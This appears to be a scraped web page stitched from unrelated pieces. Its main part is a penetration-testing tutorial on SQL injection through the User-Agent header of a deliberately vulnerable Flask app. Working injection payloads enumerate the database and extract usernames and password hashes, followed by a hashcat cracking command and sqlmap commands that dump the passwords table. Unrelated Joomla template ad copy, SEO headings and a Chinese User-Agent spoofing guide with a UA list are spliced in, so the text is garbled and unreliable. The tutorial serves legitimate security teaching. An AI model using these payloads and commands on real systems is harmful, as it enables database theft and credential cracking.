Burp User Agent

According to OWASP, injection attacks are still a common attack vector. There are several tools which can be used to exploit a SQL vulnerability. A personal favourite is SQLmap. However, understanding how SQLi works is an important aspect of penetration testing. It is also crucial to understand how the underlying infrastructure works when conducting these types of attacks. PentestMonkey has a great cheat sheet for when conducting manual SQLi.

Developing a vulnerable application

User-Agent, Cookie, Encoding, and Referer, etc. Are the things we can use or craft and make our forged requests. Head over to the CSRF tutorial to know more about crafting requests. Burp Suite Forward Tab. Burp Spider is a tool for automatically crawling web applications. While it is generally preferable to map applications manually, you can use Burp Spider to partially automate this process for very large applications, or when you are short of time.

ThemeForest Sandal 2.4.2 Sandal is an impressive finance and consultancy business Joomla template designed for professional services. Sandal business Joomla template is built on a solid framework, using the latest web techniques. Most Flexible Joomla Theme with Page Builder RTL Support and Mobile Friendly $ 48 (5). Templates for the best CMS like WordPress and Joomla, e-commerce templates for WooCommerce, Shopify and more A huge library with top-quality themes and templates. ThemeForest is part of Envato Market, the creative eco-system with over 35,000 designers creating every digital asset you’ll need for your projects. Aaika – is clean multipurpose Joomla Template. It is great, professional and easy to use. You can use it for Corporate, Creative, Fashion, Photo Studio, Freelancers, Portfolio Theme, etc. Aaika Customer’s Reviews And Comments. Themeforest joomla. Buy Pzaop - Multipurpose Joomla Template by saihoai on ThemeForest. Pzaop was created to works smoothly with the latest version of Joomla 3.x. It’s the perfect template for a small com.

When a client visits the web server, the User-Agent and IP address gets stored in the database and informs the user of the values. Exploitation The web request is sent to Burp Suite’s repeater. What is an agent? In Burp Suite Enterprise Edition, 'agents' are the virtual entities that perform your automated scans using their own embedded instance of Burp Scanner. Each agent can only perform one scan at a time. Therefore, to perform multiple scans simultaneously, you need multiple agents. Burpsuite provides three way to scan for vulnerabilites, Let the burp suite scanner to do an end-to-end managed scan. In this method, the burp suite will crawl the web app, discover contents and functionalities, and then audit for vulnerabilities. The second way is letting you select an individual request to be audited.

A vulnerable application was developed using Python with its Flask library. And yes, I am fully aware that the application might be a bit silly. However, these types of vulnerabilities are common due to poor coding practices – which is demonstrated in this example. The code snippet above shows how the application extracts the visitor’s User-Agent and IP address. The values are inserted into the logging table under the user_agent and ip columns. From thereon, the newly logged information is shown to the visitor.

The code itself seems secure enough for many developers, as the SQL query is “properly” formatted and the quotes are prepared on forehand. The format feature is widely used among other Python programmers. The same feature is used to insert the data directly into their specific value. This is (of course) secure! Right…?

Burp user agent login

The image above shows the application’s feature. When a client visits the web server, the User-Agent and IP address gets stored in the database and informs the user of the values.

Exploitation

The web request is sent to Burp Suite’s repeater. The User-Agent is modified to Hello world!, which has successfully been stored in the database. Great! We can modify the User-Agent and modify the stored value. Now what?

Changing the value to a ' displays an Internal Server Error. This is a clear indication that the value was not understood by the server, which is also known as an insufficient SQL query.

INSERT INTO logging (user_agent, ip) VALUES ('', '192.168.0.51')

The query above is what was executed by the server. No wonder it threw an error! Three ' follow by a , is bad news for the server. The SQL query is not complete. However, this is good news for an attacker, as it is vulnerable to SQLi.

Burp User Agent

Hello world!', (SELECT VERSION()))-- -

The payload above enters Hello world! into the user_agent table. However, the following value ', is used to “break out” of the SQL query and continue the syntax. From thereon, a subquery is used to select the SQL version number. The version is 10.3.23-MariaDB-1, which is basically MySQL.

Furthermore, when attempting to enumerate the existing databases, the server throws the error Subquery returns more than 1 row. This is because of the insert statement only inserts two values. The first value is used by the User-Agent, whilst the second for the IP address. If the requested output contains more than one value (such as listing the databases), these must be concatenated. Otherwise, the SQL query will not work. Listing the used database with Hello world!', (SELECT database())-- - reveals that the database is named platform. However, listing all the databases is preferred.

However, without all table and column names in the database, there is still “nothing” we can do. Therefore, the database’s contents must be enumerated further.

Hello world!', (SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata))-- -

The output displays that there are two databases: information_schema and platform. These are now concatenated together due to the output limitation.

Hello world!', (SELECT GROUP_CONCAT(table_schema, table_name, column_name) FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'))-- -

The query above enumerates all tables and columns in the platform database. The output shows a series of interesting tables, such as usernames and passwords.

The table and column names in the platform database have now been discovered. The final step is to select these values.

The usernames were successfully extracted from the usernames table. However, the values are still concatenated, as the query would not work without the GROUP_CONCAT() function.

The passwords were also successfully extracted from the database. The hashes can now be appropriately formatted before being cracked with either Hashcat or John the Ripper.

gareth:$2a$10$zd96ciX9Z8rWZOGFB7k/ou8gIWLeFqDcFAY9nqkQUui4Gy/vE1gUq
john:$2a$10$MVMc8UJdcP9UrOoN46aNbOn6zP.13jt11uQzQ8xTBoMogaS2gPK.6
foo:$2a$10$FYJCqeO//Uq9EblIO4wfyezxUo.g/qtpynfyAJAe4pv9OPM/XoTuu

hashcat -D 2 -a 0 -m 3200 crack.txt /usr/share/seclists/Passwords/darkc0de.txt

The hashes can be cracked with hashcat with the syntax shown above. Any wordlist will do for weak/common passwords (such as these. Feel free to crack them). However, ensure that the driver for your GPU is installed, as hashcat supports GPU cracking, which is tremendously more powerful than CPU.

Fast track with SQLmap

sqlmap -u http://192.168.0.51:5000/ --dbms=mysql

The following syntax will automatically attempt to inject different payloads to exploit SQLi vulnerabilities. SQLmap will automatically detect injection points and attempt to exploit these, such as user agents, cookies, post data, etc. The level of testing can be adjusted with the --level flag.

SQLmap noticed that the User-Agent parameter was injectable, and started to conduct further queries in depth.

sqlmap -u http://192.168.0.51:5000/ --dbms=mysql -D platform -T passwords -C user_password --dump

Burp Scanner User-agent

SQLmap can enumerate the databases (--dbs), tables (--tables), and columns (--columns). After enumerating the tables and columns, the values can be dumped out using --dump, as shown in the syntax above.

The passwords were successfully dumped by SQLmap. This demonstrates that the attacker does not require any advanced SQL knowledge to exploit a SQL vulnerability.

Conclusion

SQL vulnerabilities are very serious, as they could lead to exposure of the entire database. Prepared statements should be used to ensure that user input cannot “break out” and modify the SQL query.

Using automated tools can also be used to exploit this type of vulnerability, which could lead to remote access. SQLmap has a feature called --os-shell, which uploads a fully interactive web shell on the targeted system. The web shells are supported on ASP, ASPX, JSP, and PHP. Not only can SQLmap expose the entire database, but also grant a reverse shell. SQLmap allows an attacker with very little knowledge to exploit a SQL vulnerability.

User Agent中文名为用户代理,简称 UA,它是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等。

一些网站常常通过判断 UA 来给不同的操作系统、不同的浏览器发送不同的页面,因此可能造成某些页面无法在某个浏览器中正常显示。比如一些钓鱼站点,也会判断终端类型,推送不同的内容。比如下面这个钓鱼站,在PC上访问,只会给你一句提示,而换在手机上访问,就可以看到它的完全内容了。

用PC访问的样子

用手机访问的样子

那么,我们要怎么在PC上看到手机才能看到的内容捏,那就可以通过修改user-agent来实现了。下面总结三种方法。

第一种:Chrome浏览器自带功能

Chrome浏览器->F12->ctrl+shift+M->选择终端->访问网站

第二种:Firefox浏览器插件

安装user-agent switcher插件->选择终端设置->访问网站

第三种:Burp Suite改包

浏览器设置代理->开启BurpSuite->抓包->改包

将红线处的user-agent参数换掉即可

附常见UserAgent

PC端的UserAgent

safari 5.1 – MAC

User-Agent:Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us)AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50

safari 5.1 – Windows

User-Agent:Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50(KHTML, like Gecko) Version/5.1 Safari/534.50

Firefox 38esr

User-Agent:Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101Firefox/38.0

IE 11

User-Agent:Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C;.NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729;InfoPath.3; rv:11.0) like Gecko

IE 9.0

User-Agent:Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;

IE 8.0

User-Agent:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)

IE 7.0

User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)

IE 6.0

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Firefox 4.0.1 – MAC

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1)Gecko/20100101 Firefox/4.0.1

Firefox 4.0.1 – Windows

User-Agent:Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1

Opera 11.11 – MAC

User-Agent:Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131Version/11.11

Opera 11.11 – Windows

User-Agent:Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11

Chrome 17.0 – MAC

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11(KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11

傲游(Maxthon)

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)

腾讯TT

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler4.0)

世界之窗(The World) 2.x

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

世界之窗(The World) 3.x

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)

搜狗浏览器 1.x

User

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)

360浏览器

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)

Avant

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)

Green Browser

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

移动端UserAgent

safari iOS 4.33 – iPhone

User-Agent:Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us)AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2Safari/6533.18.5

safari iOS 4.33 – iPod Touch

User-Agent:Mozilla/5.0 (iPod; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us)AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2Safari/6533.18.5

Burp Change User Agent

safari iOS 4.33 – iPad

User-Agent:Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9(KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5

User

Android N1

User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.7; en-us; Nexus One Build/FRF91)AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1

Android QQ浏览器 For android

User-Agent: MQQBrowser/26 Mozilla/5.0 (Linux; U; Android 2.3.7; zh-cn; MB200Build/GRJ22; CyanogenMod-7) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0Mobile Safari/533.1

Android Opera Mobile

User-Agent: Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U;en-GB) Presto/2.8.149 Version/11.10

Android Pad Moto Xoom

User-Agent: Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39)AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13

BlackBerry

User-Agent: Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+(KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+

WebOS HP Touchpad

User-Agent: Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.0; U; en-US)AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/233.70 Safari/534.6TouchPad/1.0

Nokia N97

User-Agent: Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/20.0.019;Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko)BrowserNG/7.1.18124

Windows Phone Mango

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5;Trident/5.0; IEMobile/9.0; HTC; Titan)

UC无

User-Agent: UCWEB7.0.2.37/28/999

UC标准

Burp User Agent App

User-Agent: NOKIA5700/ UCWEB7.0.2.37/28/999

UCOpenwave

Burp Spoof User Agent

User-Agent: Openwave/ UCWEB7.0.2.37/28/999

Burp User Agent Download

UC Opera

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; ) Opera/UCWEB7.0.2.37/28/999返回搜狐,查看更多

Burp User Agent Login

责任编辑: